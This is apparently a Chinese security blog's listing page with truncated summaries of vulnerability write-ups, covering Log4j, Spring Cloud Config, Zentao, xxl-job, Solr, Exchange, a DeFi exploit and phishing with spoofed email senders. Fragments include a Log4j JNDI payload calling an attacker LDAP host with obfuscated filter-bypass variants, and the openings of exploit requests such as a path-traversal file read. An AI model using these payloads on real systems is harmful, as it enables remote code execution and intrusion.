摘要: jsonp是为了解决什么问题 在互联网通信过程中,ajax请求受同源策略影响,不允许进行跨域请求,而script标签src属性中的链接却可以访问跨域的js脚本,利用这个特性,服务端不再返回JSON格式的数据,而是返回一段调用某个函数的js代码,在src中进行了调用,这样实现了跨域。 当html源码里 阅读全文
posted @ 2022-07-31 23:23 ph4nt0mer 阅读(42) 评论(0) 推荐(0) 编辑
摘要: 信息安全人员, 技术栈: [X] JAVA [X] python [X] VUE2 [ ] VUE3 [X] ES6 [X] typescript [X] Docker 联系方式:rootphantomy#hotmail.com 阅读全文
posted @ 2022-07-31 23:19 ph4nt0mer 阅读(14) 评论(0) 推荐(0) 编辑
摘要: 问题发现 笔者在一次编写一个任意文件读取的poc插件的时候,发现使用burp重放包功能可以很方便的复现漏洞,但是使用python编写的*.py脚本却如何也无法成功输出success的结果。再次查看python的脚本,陷入了久久的沉思,难道就这2行requests的发包代码,我都能写错? 代码环境问题 阅读全文
posted @ 2022-01-24 16:00 ph4nt0mer 阅读(35) 评论(0) 推荐(0) 编辑
摘要: 原来的poc: ${jndi:ldap://malicious-ldap-server.com/a} 绕过的poc: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://example.com/a} 可行 ${jndi:${lo 阅读全文
posted @ 2021-12-17 11:35 ph4nt0mer 阅读(1690) 评论(0) 推荐(0) 编辑
摘要: 先抛出攻击者地址: 0x6c9f2b95ca3432e5ec5bcd9c19de0636a23a4994 Txn hash交易: 0xac8a739c1f668b13d065d56a03c37a686e0aa1c9339e79fcbc5a2d0a6311e333 根据攻击者的交易可以看到0xae0f 阅读全文
posted @ 2021-08-31 16:09 ph4nt0mer 阅读(97) 评论(0) 推荐(0) 编辑
摘要: 下方是一个常规的 复投调用脚本。 脚本使用的是moonpots项目里pots池子合约的Compound功能,是pots stake,earn pots的部分重新复投进pots池子里。 下一篇会分享一个调用非开源合约的python脚本。 from time import time from eth_t 阅读全文
posted @ 2021-08-31 15:57 ph4nt0mer 阅读(812) 评论(0) 推荐(0) 编辑
摘要: #梅林矿池当天被攻击了两次,我们只分析第一次攻击,因为第二次攻击的方法太沙雕了 北京时间UTF+8 14点30分,bsc生态链上的defi机枪池-merlin发生了黑客大量铸造梅林代币,然后抛售,导致梅林币价短时间内在50u-25u之间上下窜动。根据tg项目群里的相关消息,对此次事件进行了追踪和研究 阅读全文
posted @ 2021-05-27 10:14 ph4nt0mer 阅读(173) 评论(0) 推荐(0) 编辑
摘要: exchange2013会有点问题 ''' Author: Udyz Reference: - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 - https://raw.githubusercontent.com 阅读全文
posted @ 2021-03-15 09:57 ph4nt0mer 阅读(491) 评论(0) 推荐(0) 编辑
摘要: 0x00 360Quake牛刀小试 在对某厂商进行授权安全测试时,苦于寻找资产,于是利用360quake的title搜索语法进行搜索边缘资产。 搜到疑似该厂商的一个边缘站点。根据经验,像这种界面的系统一般多多少少都有漏洞。 因为站点只有一个后台界面,所以我们的漏洞利用点一般先是寻找爆破弱口令账户,或 阅读全文
posted @ 2021-01-08 10:43 ph4nt0mer 阅读(745) 评论(0) 推荐(0) 编辑
摘要: 利用条件:version ⇐1.9.2 POST /xxl-job-admin/api HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Android 9.0; Mobile; rv:66.0) Gecko/66.0 Firefox/66 阅读全文
posted @ 2020-11-02 10:39 ph4nt0mer 阅读(846) 评论(0) 推荐(0) 编辑
摘要: CNVD-C-2020-121325禅道文件上传漏洞 CNVD-C-2020-121325文件上传漏洞主要影响以下禅道版本: 禅道开源版<=12.4.2,建议升级到禅道12.4.3以上版本 利用条件:需要后台权限 GET /zentao/client-download-1-aHR0cDovLzEyM 阅读全文
posted @ 2020-10-26 18:09 ph4nt0mer 阅读(783) 评论(0) 推荐(0) 编辑
摘要: 需要solr以cloud模式启动,特征是: 会有一个cloud的功能 。 编译一个恶意配置: 在对应目录下依次执行以下shell命令。 /solr-7.7.0/server/solr/configsets/sample_techproducts_configs/conf zip -r - * > m 阅读全文
posted @ 2020-10-15 18:23 ph4nt0mer 阅读(1843) 评论(0) 推荐(1) 编辑
摘要: 0x00 apache ofbiz介绍 OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的 阅读全文
posted @ 2020-08-28 12:15 ph4nt0mer 阅读(2610) 评论(1) 推荐(0) 编辑
摘要: 0x00 什么是shiro Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 0x01 环境搭建 springboot shiro1. 阅读全文
posted @ 2020-08-20 16:49 ph4nt0mer 阅读(2877) 评论(0) 推荐(0) 编辑
摘要: 0x01 问题原因 Apache Struts 框架在强制时对分配给某些标记属性的属性值执行双重计算,以便可以传递一个值,该值将在呈现标记的属性时再次计算。对于精心设计的请求,这可能会导致远程代码执行 (RCE)。 只有在 Struts 标记属性内强制使用OGNL表达式时,当表达式用于计算攻击者可以 阅读全文
posted @ 2020-08-16 14:53 ph4nt0mer 阅读(2227) 评论(2) 推荐(0) 编辑
摘要: 360cert文章地址:https://cert.360.cn/report/detail?id=b747e983cd8f70a9eb315c2c7b38fe24 0x00 weblogic 受影响版本 Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0, 1 阅读全文
posted @ 2020-08-10 14:44 ph4nt0mer 阅读(2055) 评论(5) 推荐(0) 编辑
摘要: 最近接到一个活,是需要给客户进行邮件钓鱼。客户的要求是:伪造他们自己的邮箱进行钓鱼。 之前按我的理解是,邮箱网关服务器配置了spf的话,理论上是无法伪造邮箱的。但是实际上测试好像还是可以的,目前为止好像就qq邮箱比较严,伪造不了,163啥的都可以,只是不能伪造一些大型的域名。 目前搞这些活的思路就是 阅读全文
posted @ 2020-07-02 18:22 ph4nt0mer 阅读(421) 评论(0) 推荐(0) 编辑
摘要: [CVE-2020-1948] Apache Dubbo 反序列化漏洞分析 简介 Dubbo 是一款高性能、轻量级的开源 Java RPC 框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。 POC https://www.mail-archive.co 阅读全文
posted @ 2020-06-24 00:29 ph4nt0mer 阅读(2759) 评论(0) 推荐(0) 编辑
摘要: CVE-2020-5405 Spring Cloud Config 目录穿越漏洞分析 CVE-2020-5405 分析 先放 本地 poc: GET /1/1/(_)..(_)..(_)c:/Temp/1.txt HTTP/1.1 Host: 127.0.0.1:8888 User-Agent: M 阅读全文
posted @ 2020-06-18 18:38 ph4nt0mer 阅读(657) 评论(0) 推荐(0) 编辑
摘要: CVE-2019-3799spring-cloud-config 目录穿越漏洞复现 目前受影响的 Spring Cloud Config 版本: Spring Cloud Config 2.1.0 ~ 2.1.1Spring Cloud Config 2.0.0 ~ 2.0.3Spring Clou 阅读全文
posted @ 2020-06-18 14:16 ph4nt0mer 阅读(1309) 评论(0) 推荐(0) 编辑